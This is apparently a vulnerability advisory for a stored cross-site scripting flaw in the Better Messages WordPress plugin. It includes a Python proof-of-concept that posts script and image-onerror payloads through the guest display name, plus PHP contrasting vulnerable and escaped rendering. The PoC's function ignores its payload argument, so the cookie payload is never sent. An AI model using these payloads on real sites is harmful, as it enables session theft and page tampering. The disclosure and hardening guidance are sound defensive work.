Security Vulnerability Report
CVE-2025-14154 CVSS 6.1 MEDIUM

CVE-2025-14154

Published: 2025-12-17 06:15:42
Last Modified: 2026-04-15 00:35:42

Description

The Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Stored Cross-Site Scripting via guest display name in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Better Messages plugin ≤ 2.10.2 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import random
import string


def generate_random_name():
    return ''.join(random.choices(string.ascii_letters, k=8))


def exploit_stored_xss(target_url, malicious_payload):
    """
    CVE-2025-14154 PoC - Better Messages Plugin Stored XSS via Guest Display Name

    Vulnerability: Stored XSS in guest display name field
    Affected: Better Messages plugin <= 2.10.2
    Attack Vector: Unauthenticated attacker injects JS via guest user registration
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Generate random guest identifier
    guest_id = generate_random_name()

    # Malicious payload - XSS via display name
    # This will be stored and executed when other users view the message
    payload = f'{guest_id}<script>alert(String.fromCharCode(88,83,83))</script>'

    # Simulate guest message submission with malicious display name
    data = {
        'guest_name': payload,
        'message': 'Test message for XSS verification',
        'action': 'bp_messages_send_reply'
    }

    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        print(f'[+] Payload sent: {payload}')
        print(f'[+] Response status: {response.status_code}')
        return True
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False


if __name__ == '__main__':
    target = 'https://vulnerable-site.com/wp-admin/admin-ajax.php'
    xss_payload = '<img src=x onerror=alert(document.cookie)>'
    exploit_stored_xss(target, xss_payload)
    print('[+] Check if XSS is triggered when viewing messages')
```
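The description names the two missing controls, input sanitization and output escaping. The PHP below is an added illustration for defenders, not code from the Better Messages plugin or from the fix changeset listed in the references: it shows the rendering pattern that makes a stored display name dangerous next to a hardened form. The function names, the markup layout and the sample guest name are constructed for this example; the sanitizer and escaper stand in for WordPress's own sanitize_text_field() and esc_html().

```php
<?php
// Added example (not the plugin's code): the stored-XSS pattern behind
// CVE-2025-14154 and a hardened equivalent. Function names, markup and
// the sample guest name are constructed for illustration.

declare(strict_types=1);

// Vulnerable pattern: the guest display name is stored exactly as submitted
// and concatenated into HTML on output. Any markup inside the name is parsed
// by every browser that renders the message list, which is why the advisory
// rates this as stored XSS with changed scope.
function render_message_vulnerable(string $guest_name, string $message): string
{
    return '<div class="bm-message"><span class="bm-author">' . $guest_name
        . '</span>: ' . $message . '</div>';
}

// Hardened form, two layers:
//  1. Normalize on input: drop tags and control characters, collapse
//     whitespace, cap the length (WordPress: sanitize_text_field()).
//  2. Escape on output for the HTML text context (WordPress: esc_html()).
// Output escaping is the control that actually prevents script execution;
// input sanitization only limits what reaches the database.
function sanitize_guest_name(string $raw): string
{
    $name = strip_tags($raw);
    $name = preg_replace('/[\x00-\x1F\x7F]/', '', $name) ?? '';
    $name = trim(preg_replace('/\s+/', ' ', $name) ?? '');
    return mb_substr($name, 0, 60); // assumes the mbstring extension
}

function esc_html_text(string $text): string
{
    // ENT_QUOTES also encodes single quotes, so the same helper is safe
    // if a value is later reused inside a quoted attribute.
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function render_message_hardened(string $guest_name, string $message): string
{
    return '<div class="bm-message"><span class="bm-author">' . esc_html_text($guest_name)
        . '</span>: ' . esc_html_text($message) . '</div>';
}

// Constructed sample: a guest name that carries markup, the shape of input
// the advisory describes.
$guest_name = 'guest_xyz<img src=x onerror=alert(1)>';
$message    = 'hello';

echo "vulnerable : ", render_message_vulnerable($guest_name, $message), PHP_EOL;
echo "hardened   : ", render_message_hardened(sanitize_guest_name($guest_name), $message), PHP_EOL;
// The hardened line contains no live element: strip_tags() reduces the name
// to "guest_xyz", and any angle brackets that survived sanitization would be
// emitted as &lt; and &gt; by the output escaper.
```

The escaper has to match the output context: esc_html() for text nodes, esc_attr() for attribute values, and a JSON encoder when the name is embedded in inline script data. A display name that is sanitized on input but written into a different context than the one it was escaped for is still exploitable, which is why the hardened renderer escapes at the point of output rather than trusting the stored value.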

References

https://plugins.trac.wordpress.org/changeset/3420771/bp-better-messages/trunk/inc/guests.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/d68bbf0d-72e9-4295-a1e1-4abeb36cae1b?source=cve

Weakness: CWE-79

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14154",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T06:15:41.747",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Stored Cross-Site Scripting via guest display name in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3420771/bp-better-messages/trunk/inc/guests.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d68bbf0d-72e9-4295-a1e1-4abeb36cae1b?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```